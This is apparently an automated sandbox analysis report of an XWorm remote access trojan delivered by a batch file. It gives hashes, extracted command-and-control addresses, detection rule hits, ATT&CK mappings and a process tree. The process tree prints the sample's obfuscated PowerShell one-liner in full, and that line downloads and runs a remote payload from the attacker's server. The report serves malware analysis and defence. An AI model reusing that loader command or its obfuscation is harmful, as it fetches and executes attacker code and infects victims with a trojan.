xworm | 89e11b195c89fc104208da51765503cc941c169ef118c8180d268dd1ecf8d096

General

Target

cmd.bat
Size

179B
MD5

de7481e65ab0afc6d3928aeed6b20b7d
SHA1

9590ec1a379ae574c161aadc5ece66c185adb072
SHA256

89e11b195c89fc104208da51765503cc941c169ef118c8180d268dd1ecf8d096
SHA512

65ca342a1251c7954cc74877155afacc9d111b1039f3a773e07f5dcf6b98b76eb1147fd6091152f5ffd827b1bb4971d9d80c295bb744c2199c475d71f536cf67

Score

10^/10

xworm discovery execution rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://185.7.214.54/a.mp4

Extracted

Family

xworm

Version

5.0

C2

185.7.214.108:4411

185.7.214.54:4411

aes.plain

Signatures

Detect Xworm Payload 3 IoCs

resource	yara_rule
behavioral2/files/0x000a00000001e4d1-25.dat	family_xworm
behavioral2/memory/4552-26-0x0000020763740000-0x0000020763750000-memory.dmp	family_xworm
behavioral2/memory/4480-28-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	4552	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4552	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4552 set thread context of 4480	4552	powershell.exe	97

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4552	powershell.exe
4552	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4552	powershell.exe
Token: SeDebugPrivilege	4480	MSBuild.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 2648 wrote to memory of 4552	2648	cmd.exe	86
PID 2648 wrote to memory of 4552	2648	cmd.exe	86
PID 4552 wrote to memory of 184	4552	powershell.exe	95
PID 4552 wrote to memory of 184	4552	powershell.exe	95
PID 184 wrote to memory of 2864	184	csc.exe	96
PID 184 wrote to memory of 2864	184	csc.exe	96
PID 4552 wrote to memory of 4480	4552	powershell.exe	97
PID 4552 wrote to memory of 4480	4552	powershell.exe	97
PID 4552 wrote to memory of 4480	4552	powershell.exe	97
PID 4552 wrote to memory of 4480	4552	powershell.exe	97
PID 4552 wrote to memory of 4480	4552	powershell.exe	97
PID 4552 wrote to memory of 4480	4552	powershell.exe	97
PID 4552 wrote to memory of 4480	4552	powershell.exe	97
PID 4552 wrote to memory of 4480	4552	powershell.exe	97

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cmd.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2648
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$GR9='ject Net.WebCli';$KX4='loadString(''http://185.7.214.54/a.mp4'')';$GQ7='ent).Down';$IL3='(New-Ob';$TC=IEX ($IL3,$GR9,$GQ7,$KX4 -Join '')|IEX"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4552
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cjeak5o3\cjeak5o3.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:184
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB91E.tmp" "c:\Users\Admin\AppData\Local\Temp\cjeak5o3\CSCA08B634EC6534A68A3EE715DB376A570.TMP"
      4⤵
      PID:2864
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:4480

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESB91E.tmp

Filesize
1KB

MD5
bc0bf1e494a18493083279fd435f6370

SHA1
8637725e426d609a15d37c961d6b0f1253fb831b

SHA256
bcb6c47986087e924d446aa501e304a4b2c1ae3cf49ad74466c43c283e15c13d

SHA512
7b1f83434920fafa3b2cf796df2b60b7801a0ce8e301e8e8609354bfdb0b5b4a96f827d83b0067a7076918ac645ce6fc59df1e4a17afe1cf2aebb2b3a7490887

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_55efqho4.hej.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cjeak5o3\cjeak5o3.dll

Filesize
42KB

MD5
7756bb561289556d560607fe527716b6

SHA1
772256eedc4847f939164cdd0438652ce2bfd7c5

SHA256
569e45c9cde78cd2b0ef5973bfe1e894d83a62a5e0dbe6b369f57617d0794a5a

SHA512
f60f671e1b71387c59d7b8674eec6edf2d464141fcd486f35087f63883ae7b8a503e404d50e75980388c3a58fa3f37466462bb83b70c9f54ce749938c6d8d727

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cjeak5o3\CSCA08B634EC6534A68A3EE715DB376A570.TMP

Filesize
652B

MD5
bd952270c2f25f25c713efe15fae3485

SHA1
1e3084bf6339832b52ca32c8cff0709df4399a78

SHA256
7495463cc8d05ef71936d2e1ef6528d348e263fe94d3f8335dc143617726e0be

SHA512
a9fc2cc2cfbd95ee4080519d61b015f24d129a0ed217fb915bb39a0ccb745f429c64d8938a775cb5796d15042ed3e09eee90e93726aa0564d542ce8f35d6ae71

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cjeak5o3\cjeak5o3.0.cs

Filesize
104KB

MD5
4c235e59a96c8c09a6f7e97b95772164

SHA1
7350cfb88fbf6a2e7a9b12ad85f12e174b22b76a

SHA256
3a8459f7033c4dec0a2a8ee37090fa2fe38a2013667c969ac870965deb0b8c8d

SHA512
0857cc0c6c0aa7204772873a02fbeb11a05d0c890241eedaee6bf4fdd3a4ceaf18e6d612c7e3d47ba1c077104cf91809b133dc2420864d16cd15315c2d47cdf9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cjeak5o3\cjeak5o3.cmdline

Filesize
204B

MD5
e4dea52064aca228d5ac47ae6adb9943

SHA1
3f6b883cd65b1b6f444ffa7435f3a3ad3a4c498d

SHA256
93f79a06e050a7f8bcd3fbbabc65f9b146cabcb58d6603af3200d6f1e223d932

SHA512
23b5ef7d1b0394288b05af94454c2f96bf9e42c7f33f53be36ec0a5abb51f466cb76e25b695294d11ce7b9db76ad30dab2b22453892c8510ee4d823a206f647d

Download Submit
memory/4480-33-0x0000000005A20000-0x0000000005ABC000-memory.dmp

Filesize
624KB

Download
memory/4480-32-0x000000007452E000-0x000000007452F000-memory.dmp

Filesize
4KB

Download
memory/4480-37-0x00000000070F0000-0x0000000007694000-memory.dmp

Filesize
5.6MB

Download
memory/4480-36-0x0000000006AA0000-0x0000000006B32000-memory.dmp

Filesize
584KB

Download
memory/4480-35-0x00000000060B0000-0x0000000006116000-memory.dmp

Filesize
408KB

Download
memory/4480-34-0x000000007452E000-0x000000007452F000-memory.dmp

Filesize
4KB

Download
memory/4480-28-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4552-1-0x0000020763C20000-0x0000020763C42000-memory.dmp

Filesize
136KB

Download
memory/4552-31-0x00007FFAF18E0000-0x00007FFAF23A1000-memory.dmp

Filesize
10.8MB

Download
memory/4552-0-0x00007FFAF18E3000-0x00007FFAF18E5000-memory.dmp

Filesize
8KB

Download
memory/4552-26-0x0000020763740000-0x0000020763750000-memory.dmp

Filesize
64KB

Download
memory/4552-13-0x000002077C120000-0x000002077C176000-memory.dmp

Filesize
344KB

Download
memory/4552-11-0x00007FFAF18E0000-0x00007FFAF23A1000-memory.dmp

Filesize
10.8MB

Download
memory/4552-12-0x00007FFAF18E0000-0x00007FFAF23A1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads